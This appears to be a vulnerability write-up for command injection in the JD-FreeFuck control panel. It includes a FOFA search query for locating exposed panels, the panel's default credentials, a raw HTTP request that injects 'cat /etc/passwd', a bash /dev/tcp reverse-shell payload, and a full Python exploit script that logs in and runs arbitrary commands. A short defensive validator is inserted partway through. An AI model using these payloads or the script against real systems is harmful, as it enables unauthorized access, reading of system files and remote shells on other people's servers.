# JD-FreeFuck backend command execution vulnerability

==FOFA==

title="京东薅羊毛控制面板"

==Default credentials==

useradmin/supermanito

==Exploitation==
Send the following request to execute a command:

```http
POST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXX:5678
Content-Length: 50
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U
Connection: close

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
```

The cmd parameter is vulnerable to command injection: its value is handed to a shell, so the URL-encoded `;` (%3B) terminates the intended `bash jd.sh` invocation and whatever follows it runs as a separate command.
==Getshell==

The same injection point with a reverse shell as the injected command (xxx.xxx.xxx.xxx:9999 is the listener address):

```
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
```
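The injection works because the panel concatenates the cmd value into a shell command line, so a `;` ends `bash jd.sh` and starts a second command. The Python below is an added example, not code from this writeup or from the JD-FreeFuck project; it assumes the panel intends to run `bash jd.sh <task>`, and `ALLOWED_TASKS`, `check_runcmd`, `build_argv` and `scan_bodies` are illustrative names. It decodes captured /runCmd bodies, rejects any cmd with shell metacharacters or an unknown task, and shows the argv-list form that removes the shell from the path entirely.

```python
# Added example (not from the original writeup or the JD-FreeFuck project):
# a defender-side check for the /runCmd "cmd" parameter described above.
# Assumption: the panel intends "bash jd.sh <task>" with a user-chosen task;
# the task allowlist and function names are illustrative.
import re
from urllib.parse import parse_qs

# Tasks the panel is assumed to accept as the argument to jd.sh (illustrative;
# "now" and "bean_change" are the two values seen in the writeup's requests).
ALLOWED_TASKS = {"now", "bean_change"}

# Characters that let a second command ride along with "bash jd.sh <task>"
# when the value is interpolated into a shell command line.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r]")


def parse_runcmd_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded /runCmd body into a flat dict."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def check_runcmd(cmd: str) -> tuple:
    """Return (ok, reason); ok is True only for 'bash jd.sh <allowlisted task>'."""
    if SHELL_META.search(cmd):
        return False, "shell metacharacter in cmd"
    if "/dev/tcp" in cmd:
        return False, "bash network redirection in cmd"
    parts = cmd.split()
    if len(parts) != 3 or parts[0] != "bash" or parts[1] != "jd.sh":
        return False, "cmd does not have the shape 'bash jd.sh <task>'"
    if parts[2] not in ALLOWED_TASKS:
        return False, "task %r not in allowlist" % parts[2]
    return True, "ok"


def build_argv(cmd: str) -> list:
    """Hardened replacement for passing cmd to a shell: an argv list for
    subprocess.run(argv, shell=False), where ';' would be a literal argument
    rather than a command separator. Raises ValueError for rejected input."""
    ok, reason = check_runcmd(cmd)
    if not ok:
        raise ValueError(reason)
    return ["bash", "jd.sh", cmd.split()[2]]


def scan_bodies(bodies) -> list:
    """Run the check over captured request bodies; return (cmd, reason) for each rejected one."""
    hits = []
    for body in bodies:
        cmd = parse_runcmd_body(body).get("cmd", "")
        ok, reason = check_runcmd(cmd)
        if not ok:
            hits.append((cmd, reason))
    return hits


# Constructed sample input: the two request bodies from the writeup
# (listener address left as the writeup's placeholder) plus one benign request.
SAMPLE_BODIES = [
    "cmd=bash+jd.sh+%3Bcat+/etc/passwd%3B+now&delay=500",
    "cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500",
    "cmd=bash+jd.sh+now&delay=500",
]

if __name__ == "__main__":
    for cmd, reason in scan_bodies(SAMPLE_BODIES):
        print("REJECTED: %r (%s)" % (cmd, reason))
    print("argv for benign request:", build_argv("bash jd.sh now"))
```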

==EXP==

===Usage===

```shell
python3 exploit.py -u http://xx.xx.xx.xx:5678 -c "command"
python3 exploit.py -u http://127.0.0.1:5678 -c "cat /etc/passwd"
```
```python
import requests
import json
import sys
import argparse


def login(url, username="useradmin", password="supermanito"):
    """Log in with the panel's default credentials and return the authenticated session."""
    loginReq = requests.Session()
    payload = {
        "username": username,
        "password": password
    }
    headers1 = {
        "Accept": "*/*",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9"
    }

    headers = {
        "Accept": "*/*",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Origin": url,
        "Referer": url,
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9"
    }

    # Load the login page first so the session cookie exists before /auth is POSTed.
    loginReq.get(url, headers=headers1)
    content = loginReq.post(url + "auth", data=payload, headers=headers)
    response = json.loads(content.text)
    if response["err"] == 0:
        print("login success")
        return loginReq
    else:
        print("login failure")
        raise RuntimeError("Can't login, because -> " + response["msg"])


def exploit(url, session, command):
    ''' POST form looks like
    POST /runCmd HTTP/1.1
    Host: XXX.XXX.XXX.XXXX:5678
    Content-Length: 51
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc
    Connection: close

    cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000
    '''
    headers = {
        "Accept": "*/*",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close"
    }
    # requests form-encodes the values itself, so the spaces are written literally here
    # (the "+" in the captured request above is the form encoding of a space).
    # The ";" ends "bash jd.sh bean_change" and the injected command follows it.
    datas = {
        "cmd": "bash jd.sh bean_change;" + command + ";",
        "delay": "1000"
    }
    response = session.post(url + "runCmd", data=datas, headers=headers)
    objectResponse = json.loads(response.text)
    if objectResponse["err"] == 0:
        print("execute success", "\n")
        print("$ " + command)
        for line in objectResponse["msg"].split("\n"):
            print(line)
    else:
        print("execute failure")
        raise RuntimeError("Can't execute --> " + objectResponse["msg"])


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="this is the EXP of JD fuck")
    parser.add_argument("-u", metavar="url", type=str, required=True,
                        help="url there, e.g: http://127.0.0.1:5678/")
    parser.add_argument("-c", metavar="command", type=str, required=True,
                        help="execute command, e.g: ls")
    args = vars(parser.parse_args(sys.argv[1:]))
    url = args["u"]
    command = args["c"]
    # "auth" and "runCmd" are appended to the base URL, so it must end with "/".
    if not url.endswith("/"):
        url += "/"
    exploit(url, login(url), command)
```
==References==

https://www.secquan.org/Discuss/1071932#reply3

https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA

https://github.com/Esonhugh/JD-Freefuckfucker (exp/poc)
